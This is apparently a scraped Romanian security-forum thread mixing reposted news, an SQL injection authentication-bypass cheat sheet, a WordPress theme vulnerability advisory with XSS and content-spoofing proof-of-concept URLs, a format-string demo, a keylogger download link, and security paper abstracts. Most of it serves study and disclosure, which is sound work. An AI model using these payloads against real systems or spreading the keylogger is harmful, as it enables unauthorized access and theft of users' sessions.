Nytro

[h=1]Kaspersky Warns of Malware Targeting Kindle Fire[/h]By Jeff Goldman | December 24, 2012 Kaspersky's Roel Schouwenberg recently came across two fake apps in the Amazon App Store, "Internet Accelerator Speed Up" and "Shake Battery Charger," which claim to offer performance improvements, but don't do anything except deliver Airpush mobile ads. "It should come as no surprise that there are malicious apps in the Amazon App Store," Schouwenberg writes. "Amazon.com is incredibly popular and it's a very trivial step to also upload an app into their store. We detect these pieces of malware as HEUR:Hoax.AndroidOS.FakeBapp.a and have been in contact with Amazon.com about this. The apps were previously available in Google Play as well, but had been removed at an earlier time." "After a bit of online research, Schouwenberg found a Twitter account [matching the developer's name], and discovered that references in the app code to 'Bapplz' match references in the social feed," Infosecurity reports. "That in turn [led] to the discovery of a website called bapplz.com that hasn’t been updated since August. 'Clearly, the project seems abandoned even if it's still making the author some money,' he noted." Sursa: Kaspersky Warns of Malware Targeting Kindle Fire - eSecurity Planet

[h=2]SQL Injection Authentication Bypass Cheat Sheet[/h]This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin ?slam Tatl?If (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list. or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 Sursa: SQL Injection Authentication Bypass Cheat Sheet

Salut tex, A trecut mult timp, am auzit multe pareri si inca nu stiu sigur ce s-a intamplat, dar eu cred ca ar trebui schimbat radical sistemul judiciar din Romania deoarece stim cu totii ca este la pamant. Imi pare rau ca ti-ai petrecut Craciunul astfel, dar eu sunt sigur ca o sa fie bine deoarece tu nu ai nicio vina. E trist ca "militia" nu face diferenta intre un provider de hosting si un client al acestuia... A fost o lovitura pentru toti, poate din cauza alegerilor, poate din cauza ca vine sfarsitul de an si poate trebuia trasa o linie, nu avem de unde sa stim, dar cert este ca s-au facut greseli. Nu am vrut sa ma implic prea mult, deoarece sincer, imi este putina frica, mai ales ca am redeschis RST pentru a face un bine intregii comunitati si pentru a le arata ca nu ne dam batuti, insa fiind un administrator al "grupului organizat RST" am motivele mele sa ma tem. Ideea e ca suntem alaturi de tine si ca eu sunt sigur ca o sa iasa totul bine, sper doar sa nu se tot amane lucrurile cum am inteles ca s-a intamplat in multe cazuri. // Nytro

Cadouri de Craciun: Super-moderatori: - Cheater - M2G Administratori: - begood - em

Pula, daca lasam IP-ul 1.3.3.7 tuturor apareau probleme la logare. Asa ca alegem varianta taraneasca: $_SERVER['REMOTE_ADDR'] = (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254);

Zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

sdfdsfdsfdsdsf

Nu e el.

Pentru a sta linistiti toti paranoicii, adica cei care se cred importanti desi nu da nimeni doi bani pe ce (nu) au facut ei, de aceste sarbatori, intre Craciun si Revelion, nu vor fi salvate IP-uri: mysql> update post set ipaddress = '1.3.3.7'; Query OK, 390557 rows affected (18.36 sec) Rows matched: 390562 Changed: 390557 Warnings: 0 mysql> update user set ipaddress = '1.3.3.7'; Query OK, 99168 rows affected (1.55 sec) Rows matched: 99169 Changed: 99168 Warnings: 0 Dupa Revelion, daca tot mancati cacat ca cine stie ce ati facut, invatati sa folositi Tor, VPN-uri sau orice altceva. Muie. Adica Craciun fericit.

Test

Digital Keylogger v4.0.zip - Speedy Share - upload your files here

Da voi ce pula mea faceti?

Effective Approaches To Web Application Security Description: Abstract This presentation will focus on new and interesting approaches to web application security problems posed by a continuous deployment environment. Specifically, this presentation will cover useful security systems such as automatic vulnerability and application fault detection, effective platform defenses for XSS/SQLi, practical security alerting mechanisms, and visualizations of security related data. This talk demonstrates how to create these systems using free tools that improve security posture without commercial security products. ***** Speaker: Zane Lackey, Security Engineer Manager, Etsy Zane Lackey leads the security groups at Etsy, the world’s marketplace of creative independent businesses. Prior to Etsy, Zane was a Senior Security Consultant at iSEC Partners with a focus in the fields of mobile and web application security. His research has been featured in notable media outlets such as the BBC, Associated Press, Forbes, Wired, CNET, SC Magazine and numerous others. A frequent speaker at top industry conferences, he has presented at BlackHat, RSA, Microsoft BlueHat, Toorcon, DeepSec, SANS, OWASP, guest lectured at NYU, and in 2010 was named as one of 12 prominent security researchers by Network World magazine. He is a contributing author of Mobile Application Security (McGraw-Hill), a co-author of Hacking Exposed: Web 2.0 (McGraw-Hill), and a contributing author/technical editor of Hacking VoIP (No Starch Press). He holds a Bachelor of Arts in Economics with a minor in Computer Science from the University of California, Davis. ***** Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Effective Approaches to Web Application Security - Zane Lackey on Vimeo Sursa: Effective Approaches To Web Application Security

Cyberspace And Beyond - Evolution In Action Description: PDF : - https://hacktivity.com/en/downloads/archives/221/ Sir David Pepper was the Director of the Government Communications Headquarters (GCHQ) – the UK Government’s agency responsible for Signals Intelligence and electronic information security. He retired in July 2008, having taken up that post in April 2003. After taking a degree in Physics and a DPhil in Theoretical Physics at St John’s College, Oxford, he joined GCHQ in 1972. He spent all his career there except for a spell in the Home Office in 1998-2000, where he was responsible for infrastructure and modernisation. Much of his time at GCHQ was spent managing intelligence production, but he also had spells as Finance Director and HR Director. As the Director, his focus was on leading transformational change, as GCHQ responded to the challenges of the Internet both in intelligence production and in meeting the new problems of cyber-security. Since retiring from GCHQ, he has been a member of the previous UK Government’s National Security Forum, and held other non-executive positions including a role with Gloucestershire County Council. He is currently a member of the Advisory Board of Thales UK, and works with Deloitte on cyber risk and national security issues. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Cyberspace And Beyond - Evolution In Action

Security Code Review Description: His speciality is web application security. After a strong development past his interest turned to security 7 years ago when he participated in a corporate web sso development. Currently he is a trainer and auditor at Cloudbreaker Co. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Security Code Review

de4dot .NET deobfuscator and unpacker [h=1]Description[/h] de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (eg. string encryption), but symbol renaming is impossible to restore since the original names aren't (usually) part of the obfuscated assembly. [h=1]Features[/h] Here's a pseudo random list of the things it will do depending on what obfuscator was used to obfuscate an assembly: Inline methods. Some obfuscators move small parts of a method to another static method and calls it. Decrypt strings statically or dynamically Decrypt other constants. Some obfuscators can also encrypt other constants, such as all integers, all doubles, etc. Decrypt methods statically or dynamically Remove proxy methods. Many obfuscators replace most/all call instructions with a call to a delegate. This delegate in turn calls the real method. Rename symbols. Even though most symbols can't be restored, it will rename them to human readable strings. Sometimes, some of the original names can be restored, though. Devirtualize virtualized code Decrypt resources. Many obfuscators have an option to encrypt .NET resources. Decrypt embedded files. Many obfuscators have an option to embed and possibly encrypt/compress other assemblies. Remove tamper detection code Remove anti-debug code Control flow deobfuscation. Many obfuscators modify the IL code so it looks like spaghetti code making it very difficult to understand the code. Restore class fields. Some obfuscators can move fields from one class to some other obfuscator created class. Convert a PE exe to a .NET exe. Some obfuscators wrap a .NET assembly inside a Win32 PE so a .NET decompiler can't read the file. Removes most/all junk classes added by the obfuscator. Fixes some peverify errors. Many of the obfuscators are buggy and create unverifiable code by mistake. Restore the types of method parameters and fields [h=1]Supported obfuscators/packers[/h] Agile.NET (aka CliSecure) Babel.NET CodeFort CodeVeil CodeWall CryptoObfuscator DeepSea Obfuscator Dotfuscator .NET Reactor Eazfuscator.NET Goliath.NET ILProtector MaxtoCode MPRESS Rummage Skater.NET SmartAssembly Spices.Net Xenocode Some of the above obfuscators are rarely used (eg. Goliath.NET), so they have had much less testing. Help me out by reporting bugs or problems you find. Download: https://bitbucket.org/0xd4d/de4dot/downloads Sursa: https://bitbucket.org/0xd4d/de4dot/overview

Multiple vulnerabilities in multiple themes for WordPress From: "MustLive" <mustlive () websecurity com ua> Date: Sun, 23 Dec 2012 01:39:25 +0200 Hello list! Some time ago, when I've found vulnerabilities in plugin BuddyPress for WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox, which I disclosed earlier, I also found multiple vulnerable themes for WP with Rokbox. So I want to warn you about multiple vulnerabilities in multiple themes for WordPress. These are themes developed by Rokbox's developers. And they put Rokbox (with JW Player, but without TimThumb) into their themes. These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW Player in June and August (including in commercial version JW Player Pro) and disclosed vulnerabilities in Rokbox in December. These vulnerabilities are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found many WP themes by other developers with Rokbox, but I'd write about them separately, because they have much more holes. ------------------------- Affected products: ------------------------- Vulnerable are all WordPress themes by RocketTheme (during quick research I found 16 themes for WP, in addition to above-mentioned theme for BP, but I supposed all their themes contain Rokbox with JW Player 4.4.198). They haven't removed this vulnerable version of JW Player from Rokbox and so from any of their themes (for WP and BP), when I've informed them in August. Here are these 16 vulnerable themes, which I found: rt_afterburner_wp rt_refraction_wp rt_solarsentinel_wp rt_mixxmag_wp (Mixxmag) rt_iridium_wp rt_infuse_wp (infuse) rt_perihelion_wp rt_replicant2_wp rt_affinity_wp rt_nexus_wp rt_sentinel rt_mynxx_wp_vestnikp rt_mynxx_wp (rt.mynxx.wp) rt_moxy_wp rt_terrantribune_wp rt_meridian_wp They will be added to those 94 vulnerable themes for WordPress, in which I've found vulnerabilities (http://websecurity.com.ua/4915/). In Google's index there are now up to 634000 pages with Rokbox at WP sites. So there are a lot of vulnerable themes and web sites with these themes. ---------- Details: ---------- The paths for these themes are the next: http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf Content Spoofing (WASC-12): In parameter file there can be set as video, as audio files. Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config> Content Spoofing (WASC-12): http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site XSS (WASC-08): http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Full path disclosure (WASC-13): In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for other themes), which works at default PHP settings. Also potentially there are FPD in other php-files of these themes. Information Leakage (WASC-13): There are sites with rt_mixxmag_wp theme, which have error log with full paths. http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log ------------ Timeline: ------------ 2012.05.29 - informed developers of JW Player. 2012.06.06 - disclosed at my site about JW Player. 2012.08.18 - informed developers about new holes in JW Player Pro. 2012.08.23 - disclosed at my site about JW Player Pro. 2012.08.28 - informed developers of Rokbox. 2012.12.14 - disclosed at my site about Rokbox. 2012.12.23 - disclosed to the lists about multiple themes for WordPress with Rokbox. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Sursa: http://seclists.org/fulldisclosure/2012/Dec/236

How to explain Hash DoS to your parents by using cats Published December 20th, 2012 by Barney Desmond We came across this interesting article recently, it’s about how an attacker can perform a denial-of-service attack by feeding perverse input to a system that uses weak hashing algorithms. This is referred to as a Hash DoS, and the specific target mentioned in the article is btrfs. btrfs is a next-gen filesystem that’s expected to replace ext3/4 in Linux. It’s still considered experimental but is quite usable and maturing fast. This article piqued our interest because we’re using btrfs “for reals” here at Anchor. It’s well and good to say that, but the article isn’t very exciting unless you have a background in computer science. How would you explain Hash DoS to your parents, who probably don’t have a CompSci background? This is the internet, so the answer is cats. Welcome to Purrfect Kitty Daycare =--= Let’s pretend that you run a daycare centre for pampered pusses. Doting owners drop their kitty off on the way to work each morning, and pick them up in the afternoon. You look after the pussies fantastically, so business is growing by leaps and bounds with more moggies every week. You can’t look after all the cats, so you hire some enthusiastic helpers. Fast forward a few months, you now have 26 cat-minders working for you while you manage the business. Each minder has their own space to work in. To divide the work, you assign them to minders based on the cat’s name: all cats whose name begins with the letter ‘A’ go to minder no. 1, the cats whose name starts with the letter ‘B’ goes to minder no. 2, and so on. When owners arrive to drop off or pick up their furry bundle of joy, they know exactly which room to go to! It’s super simple and does the job nicely. Your offices look something like this: Assume, for the sake of argument, that you moved into larger premises very quickly. What you’ve implemented is called a hash function. It’s really basic but it does the job. As long as a cat has a name, there’s a room for it, and you always know exactly where to find a cat. When you use a hash function to distribute objects like this, each object (cat) goes into a bucket (room). Kitty Kollisions Your rooms don’t fill up evenly, this is to be expected. You might have a few cats in Room A (Alice, Alison, Amanda), and only one in Room X (Xerxes). Room A has what’s called a hash collision. Finding Xerxes in the afternoon is easy, he has the whole room to himself. When Alice’s owner comes to pick her up, the attendant at the front desk has to ask what she looks like (or remember from previous visits). No big deal, we just have to check all the cats in Room A until we find Alice. It takes a couple of seconds. Sometimes you’ll get a lot of cats in one room, maybe a dozen, but you can still work out which one you’re looking for with a little effort. You’ve got ninety-nine problems but cats ain’t one. Moggy Mischief A rival appears! Kitty Kare has opened up across town and is looking to put you out of business. They’ve seen how your hashing function in action and know how it works. They’re going to use it against you, because they’re evil. First, they need cats. Lots of cats. Maybe they pick up strays off the street, or just get kittens from the internet. It doesn’t matter how, but they’ve got over nine-thousand cats. Now they give them all names starting with “Mr” – Mr Bigglesworth, Mr Fluffles, Mr Mac, Mr Pete, Mr Lincoln, Mr MoonUnit, etc. The list is practically infinite. Each cat gets a little engraved nametag on its collar and goes on its catty way. They bring all the cats to Purrfect Kitty Daycare. Your staff are very smart people, and manage to handle the tsunami of tabbies by moving a few walls around to make enough room. It slows them down a bit, and your customers get irate that they have to wait to drop off their cat, but they get there in the end. Your offices now look something like this: Phew, it’s a good thing you invested in a rapidly reconfigurable walling system! Meltdown Real mayhem arrives in the afternoon: evil employees from Kitty Kare return and ask to pick up ALL the cats. One by one. Placing a cat in the room takes a roughly-fixed amount of time, called constant time when dealing with algorithms, mathematically written as O(1). Finding a particular cat means going to the room and checking all the cats there. The more cats there are, the longer it takes. This is called linear time, written as O(n). On average, your staff have to search about 4,500 cats (half of all the cats in the room) before they happen to find the right one. Things get better as some of the cats are returned to their (evil) owners, but it’s a bad situation for a long time. Your genuine customers are quite angry and upset, and it’s well past midnight by the time you knock off and go home. You get home that night and have dreams. Bad dreams, about being overwhelmed by cats. You’ve just been Hash DoS’d, with cats. Fixing those felines In short, the answer to this problem is to use a hash function that isn’t vulnerable to this sort of attack. A cryptographic hash function is a special type of hash function that makes it difficult to create specifically-chosen collisions like the one shown here. This won’t completely prevent the evil attacker from hammering away and trying to produce cat-names that happen to cause collisions, but it makes life a lot harder for them. A full-blown cryptographic hash function like SHA-1 would probably be overkill for your kitty daycare centre, but it’s the right line of thinking. So long as your hash function can evenly distribute cats into rooms, all you need to worry about is having enough staff to look after them all. Purrfect! Sursa: How to explain Hash DoS to your parents by using cats | Anchor Web Hosting Blog

[h=1]Format Strings: Is Objective-C Objectively Safer?[/h]HP_SSR| August 9, 2012 - last edited August 15, 2012 With the explosion of mobile devices came mobile applications, and with the mobile applications came a plethora of new security and privacy concerns. If you've been following this blog or our products, you probably know that we just released our first Objective-C rulepacks, with a lot more support planned in the future. To kick things off, let's talk about one of the vulnerabilities that our Objective-C rulepacks can detect: format string flaws. A common misconception is that Objective-C is a newer language compared to C and C++, and is therefore immune to many of the classic C vulnerabilities such as buffer overflows. In the C and C++ world, one cousin of the well-known buffer overflow exploit is format string attacks. Since Objective-C also supports format strings, does that mean that its applications are vulnerable as well? Let's first review how C/C++-style format string attacks work, then compare these to what Objective-C lets us do. A string format function, such as printf(), takes in a format string and a variable list of arguments. Normally (with the exception of the %n specifier—more on that later), the format specifiers in the string is replaced with the values of the respective arguments. What happens if there are more specifiers than there are arguments? For example, printf("%d%d%d%d%d\n", val); C and C++ will gladly continue to pop values off the stack until it fills in every value for every format specifier. What if an attacker is able to control the format string? At best, the program will crash or function incorrectly due to the damaged call stack. At worst, it can reveal sensitive information stored in local variables or passed as arguments to functions. The story gets worse. C and C++ support the %n specifier, which writes a value—namely, the number of bytes written thus far—back to the corresponding variable. By controlling the number of bytes written and storing the value of %n, we can write any value back to the stack, including the address of any attacker-controlled malicious code. (To avoid having to write millions of characters just to form a 32-bit address, we can instead write %n four times, a single byte at a time.) If we can also manipulate the stack to fool the program into treating the value as the return pointer, then we can force the program to run our malicious code—not unlike a buffer overflow exploit. So how much of this applies to Objective-C? The good news is that format string methods introduced by Objective-C do not allow the %n specifier, so there are no known ways to execute arbitrary code using format strings. The bad news is that Objective-C attempts to be backwards-compatible with C/C++ libraries, continuing to allow the old %n-style code execution exploits. Nonetheless, even for the newer Objective-C-specific format string methods, using excess format specifiers to pop values off the stack still works: void myfunc(NSString *in) { NSLog(in); NSLog(@"Inside myfunc"); } int main(int argc, char *argv[]) { NSString *test = @"%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"; myfunc(test); return NSApplicationMain(argc, (const char **) argv); } The output is as follows: (gdb) 2012-02-13 22:12:12.525 objc[12983:a0f] 5fbff860.5fbff870.5fbff928.00000012.00000000.00000000.00002070.5fbff840 000017e8.5fbff860.00000000.5fbff848.00002070.5fbff850.00001784.00000000 (gdb) info args in = (NSString *) 0x100002070 (gdb) Note the address of the string test, 00002070, gets printed twice in the output, presumably because it is passed twice as an argument—once to myfunc, and again to NSLog. I should also note that in constructing the above test code, the program has also crashed several times with an EXC_BAD_ACCESS signal, further suggesting that the format string is corrupting the stack pointer. I hope the above evidence is convincing enough to show that Objective-C does not perform any safety checks on format strings, letting them manipulate the call stack easily. The next reasonable question, how exactly can this be exploited? What might vulnerable code in an application look like? Consider the following code snippet: - (BOOL)application:(UIApplication *)application openURL:(NSURL *)url sourceApplication:(NSString *)sourceApplication annotation:(id)annotation { // Write to debugging log NSLog(@"++ Entered application"); NSString *urlquery = [url query]; NSLog(urlquery); ... } This is one of the most common mistakes when using NSLog, which in turn can lead to a format string vulnerability. According to the official documentation, NSLog()'s first parameter is not a simple string, but in fact a format string. A rogue (or compromised) process might take advantage of this vulnerability by launching the app via its registered URL scheme and supply a URL with extraneous format specifiers. When the program reaches the line NSLog(urlquery), the NSLog() method now expects the values to fill in for these specifiers. It does this by gladly reaching backwards into the call stack, which corrupts the state of the stack. This causes the rest of the program to run incorrectly or eventually crash. So in short, while Objective-C format strings manage to avoid some of the more heinous exploits that allow for arbitrary code execution, they are still vulnerable to stack manipulation. Attackers can still crash your program at best, and dump sensitive data at worst. Avoid using legacy C/C++ format string methods if possible; these are still vulnerable to the code execution exploits of old. In general, be careful when working with format strings; always make sure there are equal numbers of format specifiers and arguments. More importantly, do not let sources outside of your control, such as data and messages from other applications or web services, control any part of your format strings. Posted by sarah at 12:00 PM Sursa: HP Communities - Format Strings: Is Objective-C Objectively Safer? - Enterprise Business Community

Foreign Code Detection on theWindows/X86 Platform Susanta Nanda Wei Li Lap-Chung Lam Tzi-cker Chiueh {susanta,weili,lclam,chiueh}@cs.sunysb.edu Department of Computer Science SUNY at Stony Brook Stony Brook, NY 11794-4400 Abstract As new attacks againstWindows-based machines emerge almost on a daily basis, there is an increasing need to “lock down” individual users’ desktop machines in corporate computing environments. One particular way to lock down a user computer is to guarantee that only authorized binary programs are allowed to run on that computer. A major advantage of this approach is that binaries downloaded without the user’s knowledge, such as spyware, adware, or code entering through buffer overflow attacks, can never run on computers that are locked down this way. This paper presents the design, implementation and evaluation of FOOD, a foreign code detection system specifically for the Windows/X86 platform, where foreign code is defined as any binary programs that do not go through an authorized installation procedure. FOOD verifies the legitimacy of binary images involved in process creation and library loading to ensure that only authorized binaries are used in these operations. In addition, FOOD checks the target address of every indirect branch instruction in Windows binaries to prevent illegitimate control transfers to either dynamically injected mobile code or pre-existing library functions that are potentially damaging. Combined together, these techniques strictly prevent the execution of any foreign code. Experiments with a fully working FOOD prototype show that it can indeed stop all spyware and buffer overflow attacks we tested, and its worst-case run-time performance overhead associated with foreign code detection is less than 35%. Download: www.acsac.org/2006/papers/86.pdf

Address-Space Randomization for Windows Systems Lixin Li and James E. Just R. Sekar Global InfoTek, Inc., Reston, VA Stony Brook University, Stony Brook, NY {nli,jjust}@globalinfotek.com sekar@cs.stonybrook.edu Abstract Address-space randomization (ASR) is a promising solution to defend against memory corruption attacks that have contributed to about three-quarters of USCERT advisories in the past few years. Several techniques have been proposed for implementing ASR on Linux, but its application to Microsoft Windows, the largest monoculture on the Internet, has not received as much attention. We address this problem in this paper and describe a solution that provides about 15-bits of randomness in the locations of all (code or data) objects. Our randomization is applicable to all processes on a Windows box, including all core system services, as well as applications such as web browsers, office applications, and so on. Our solution has been deployed continuously for about a year on a desktop system used daily, and is robust enough for production use. Download: seclab.cs.sunysb.edu/seclab/pubs/acsac06.pdf

Reverse Stack Execution Babak Salamat bsalamat@uci.edu Andreas Gal gal@uci.edu Alexander Yermolovich ayermolo@uci.edu Karthik Manivannan kmanivan@uci.edu Michael Franz franz@uci.edu Donald Bren School of Information and Computer Sciences University of California, Irvine Irvine, CA 92697, USA Technical Report No. 07-07 August 23, 2007 Abstract Introducing variability during program execution is an eective technique for ghting software monoculture which enables the quick spread of malicious code such as viruses and worms. Existing works in the area of automatic genera- tion of execution variability have been limited to instruction randomization and heap allocation randomization, even though stack over ows are the predomi- nant attack vectors used to inject malicious code. We present a compiler-based technique that introduces stack variance by reversing the stack growth direc- tion, and is thus able to close this loophole. In this paper we discuss the steps necessary to reverse the stack growth direction for the Intel x86 instruction set which was designed for a single stack growth direction. The performance eval- uation of our approach shows a negligible overhead for most applications. For one of the benchmark applications, we see a small performance gain. Download: www.ics.uci.edu/~kmanivan/files/TechReport07-07.pdf

Detection and Subversion of Virtual Machines Dan Upton University of Virginia CS 851 - Virtual Machines Abstract Recent virtual machines have been designed to take advantage of run-time information to provide various services including dynamic optimization, instrumenta- tion, and enforcement of security policies. While these systems must run in the same user space as the pro- gram running under their control, they must remain as transparent as possible so as to prevent aecting the correctness of the guest program. However, the virtual machine must store its own code and program state as well as information about the guest program. This data, stored in the program's user space, may lead to gaps in transparency that can be used to detect their pres- ence. Additionally, while many virtual machines have a smaller code base than operating systems, they may still contain their own unique errors and security holes. This research shows that it is possible to use dierent run-time clues to detect the existence of several com- mon virtual machines. Further, information about the existence of these virtual machines can be used to at- tack the system. As a result, this paper presents coun- termeasures that should be taken by designers of these systems to prevent detection and attacks. Download: www.cs.virginia.edu/~dsu9w/upton06detection.pdf

BUFFER OVERFLOW VULNERABILITIES EXPLOITS AND DEFENSIVE TECHNIQUES Authors Peter Buchlovsky, Adam Butcher UID 319295, 309235 Email msc33pxb@cs.bham.ac.uk, ug75ajb@cs.bham.ac.uk Introduction Buffer overflows are a very common method of security breach. They generally occur in programs written in low-level languages like C or C++ which allow the manual management of memory on the heap and stack. Server processes or low-level programs running as the superuser are the usual targets for such attacks. If a hacker can find a buffer overflow vulnerability in such a process and can exploit it, it will usually give the hacker full control of the system. The analysis of Lhee and Chapin [8] has proved most helpful in our research. 1.1 Array bounds checking Most high-level programming languages claim to be safe. This means that programs written in these language have rigorously controlled access to memory. Thus they do not suffer from buffer overflows or dangling pointers. This is in contrast to the C and C++ programming languages which have a more cavalier approach to memory access and safety. In C, array access is not bounds checked. That means it is possible to write past the end (or indeed the beginning if it is being written to backwards) of an array. This leads to a number of exploits that can used by attackers. Download: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.104.8202&rep=rep1&type=pdf

Code Injection Attacks on Harvard-Architecture Devices Aurélien Francillon INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France aurelien.francillon@inria.fr Claude Castelluccia INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France claude.castelluccia@inria.fr ABSTRACT Harvard architecture CPU design is common in the embed- ded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buer over ow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sen- sor. To our knowledge, this is the rst result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient at- tacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines dierent tech- niques such as return oriented programming and fake stack injection. We present implementation details and suggest some counter-measures. Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf